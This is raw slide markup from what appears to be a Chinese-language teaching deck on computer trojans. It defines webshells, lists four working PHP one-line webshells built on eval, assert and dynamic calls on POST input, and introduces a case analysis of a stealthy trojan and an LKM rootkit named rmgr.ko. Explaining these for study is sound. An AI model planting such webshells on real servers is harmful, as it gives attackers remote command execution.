            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27654" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567174" y="1376142"/>
            <a:ext cx="8088095" cy="4694237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是指只有一行代码的木马，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编程语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）的某个函数来执行攻击命令，也称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一句话木马示例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>])?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;?php assert($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]);?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;?$_POST['sa']($_POST['sb'],$_POST['sc'])?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;?php @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>($_POST['cmd']); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170793687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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实例分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C334B333-F11D-491E-84FD-E94CB3253E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3605605" y="431006"/>
            <a:ext cx="5343525" cy="5995988"/>
            <a:chOff x="2375693" y="957262"/>
            <a:chExt cx="5343525" cy="5995988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E5EEF76-8032-41A6-B42F-5E9A705D74C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2375693" y="957262"/>
              <a:ext cx="5343525" cy="4943475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6203FB9B-99A7-4E49-AC74-8065FEABC317}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2390683" y="5753100"/>
              <a:ext cx="5314950" cy="1200150"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178307574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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1509194"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马从植入到运行，包括后续可能的渗透活动都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>采用了各种技术进行隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，很难发现。同时，该木马也做了很多对抗，常规的安全监测能力未必可以发现。其工作流程如图所示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实例分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D2E1AFA-8128-4814-8080-6CE1A5FECBA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1420812" y="1101725"/>
            <a:ext cx="6572250" cy="5133975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194835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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043A971B-B21D-428D-854C-F31D354621A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="182458" y="2376011"/>
            <a:ext cx="8779083" cy="1401510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE6E226-9A86-4755-8543-39246091BE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8993" y="3451607"/>
            <a:ext cx="5876925" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1051726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par>
                          <p:cTn id="10" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="55"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strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15"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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C70C51D-4CEA-4EA8-9457-C23AC7474A75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="895663" y="2614952"/>
            <a:ext cx="5819775" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BCD9475-0B07-4259-8DA1-42E8C8F660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8757" y="1101725"/>
            <a:ext cx="7097398" cy="5000652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39473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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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EB10E04-393F-402A-9CF1-F6BAA31A99EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475937" y="1371600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内核模块，加载后的主要操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{545E8035-19CB-4A14-A298-9D28B527C036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rmgr.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9897F39E-3AF4-4D80-8B1B-6C91A1E2F4D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="661674" y="2483526"/>
            <a:ext cx="7400925" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F3BE25F-D7FF-43B1-8503-756308E9A0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0636" y="2845476"/>
